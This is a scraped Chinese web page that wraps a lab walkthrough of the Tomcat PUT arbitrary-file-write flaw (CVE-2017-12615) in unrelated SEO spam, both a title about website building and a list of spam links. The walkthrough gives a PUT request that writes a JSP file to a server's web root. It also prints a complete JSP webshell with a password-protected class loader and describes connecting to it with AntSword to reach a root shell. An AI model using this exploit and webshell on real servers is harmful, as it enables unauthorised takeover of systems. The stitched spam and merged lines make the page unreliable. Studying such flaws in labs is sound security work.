当前位置: 首页 > news >正文

淄博网站建设网站推广搜索到的相关信息

淄博网站建设网站推广,搜索到的相关信息,秀网站,成都企业网站建设Tomcat 任意写文件PUT方法 (CVE-2017-12615) 文章目录 Tomcat 任意写文件PUT方法 (CVE-2017-12615)1 在线漏洞解读:2 版本影响3 环境搭建4 漏洞复现4.1 访问4.2 POC攻击点4.2.1 直接发送以下数据包,然后shell将被写入Web根目录。4.2.2 访问是否通,可以访…

Tomcat 任意写文件PUT方法 (CVE-2017-12615)

文章目录

    • Tomcat 任意写文件PUT方法 (CVE-2017-12615)
      • 1 在线漏洞解读:
      • 2 版本影响
      • 3 环境搭建
      • 4 漏洞复现
        • 4.1 访问
        • 4.2 POC攻击点
          • 4.2.1 直接发送以下数据包,然后shell将被写入Web根目录。
          • 4.2.2 访问是否通,可以访问到文件
      • 5 漏洞利用
        • 5.1 上传jsp一句话
        • 5.2 kali打开蚁剑:
        • 5.3 连接jsp一句话木马,密码为 passwd
        • 5.4 打开终端,获取root

1 在线漏洞解读:

https://vulhub.org/#/environments/tomcat/CVE-2017-12615/

在这里插入图片描述

2 版本影响

​ Tomcat version: 8.5.19

3 环境搭建

cd /home/kali/vulhub/tomcat/CVE-2017-12615

在这里插入图片描述

环境启动:

sudo docker-compose up -dsudo docker ps -a

已启动:访问端口8091

在这里插入图片描述

4 漏洞复现

4.1 访问

​ 4.1 访问http://192.168.225.166:8091/看到Tomcat示例页面,发现8.5.19版本后台管理是不允许登录的

在这里插入图片描述
在这里插入图片描述

4.2 POC攻击点
4.2.1 直接发送以下数据包,然后shell将被写入Web根目录。
PUT /1.jsp/ HTTP/1.1
Host: your-ip:8080
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 5shell
4.2.2 访问是否通,可以访问到文件

在这里插入图片描述

5 漏洞利用

5.1 上传jsp一句话
<%!class U extends ClassLoader {U(ClassLoader c) {super(c);}public Class g(byte[] b) {return super.defineClass(b, 0, b.length);}}public byte[] base64Decode(String str) throws Exception {try {Class clazz = Class.forName("sun.misc.BASE64Decoder");return (byte[]) clazz.getMethod("decodeBuffer", String.class).invoke(clazz.newInstance(), str);} catch (Exception e) {Class clazz = Class.forName("java.util.Base64");Object decoder = clazz.getMethod("getDecoder").invoke(null);return (byte[]) decoder.getClass().getMethod("decode", String.class).invoke(decoder, str);}}
%>
<%String cls = request.getParameter("passwd");if (cls != null) {new U(this.getClass().getClassLoader()).g(base64Decode(cls)).newInstance().equals(pageContext);}
%>
5.2 kali打开蚁剑:
┌──(kali💋kali)-[~]
└─$ sudo antsword 
5.3 连接jsp一句话木马,密码为 passwd

在这里插入图片描述

5.4 打开终端,获取root

在这里插入图片描述

http://www.zhongyajixie.com/news/41435.html

相关文章:

  • 阿里云企业网站建设教程百度手机怎么刷排名多少钱
  • 宝洁公司网站建设现状宁波seo搜索平台推广专业
  • 上海装饰公司排名百强武汉seo托管公司
  • 做传奇网站网站建设需要啥
  • 北京网站建设手机app电子商务公司网站免费建站
  • 浅谈政府网站集约化建设淘宝关键词排名优化技巧
  • 做网站登录网页设计与制作代码成品
  • 锡山建设局网站如何做公司网站推广
  • 专业网站建设好不好seo培训资料
  • 做网站需要考虑什么石家庄网站建设方案
  • app制作平台大全海阳seo排名优化培训
  • ppt超链接网站怎么做视频营销
  • 苏州二建建筑集团有限公司seo关键词优化是什么意思
  • 做婚纱网站的目的做网站怎么优化
  • 网站建设顾问朝阳网络推广
  • 网站建设推广方法传统营销与网络营销的整合方法
  • 图片网站建设合肥百度推广排名优化
  • 网站有没有做网站地图怎么看sem推广优化
  • 化妆顺序步骤深圳百度网站排名优化
  • 如何用模板做网站视频seo网站优化方案
  • 怎么在网站添加关键词金融网站推广圳seo公司
  • 做蛋糕比较火的网站seo技术博客
  • 专业性行业网站有哪些网店运营的工作内容
  • 廊坊网站制作报价网络舆情监测专业
  • 人民政府网站的信息资源建设千峰培训出来好就业吗
  • 新冠疫苗接种查询seo概念的理解
  • 承德网站制作公司优选网十科技云计算培训费用多少钱
  • 孝感专业做网站公司网站优化seo教程
  • 台州黄岩网站建设深圳seo优化排名优化
  • 做网购内部优惠券网站网络营销的产品策略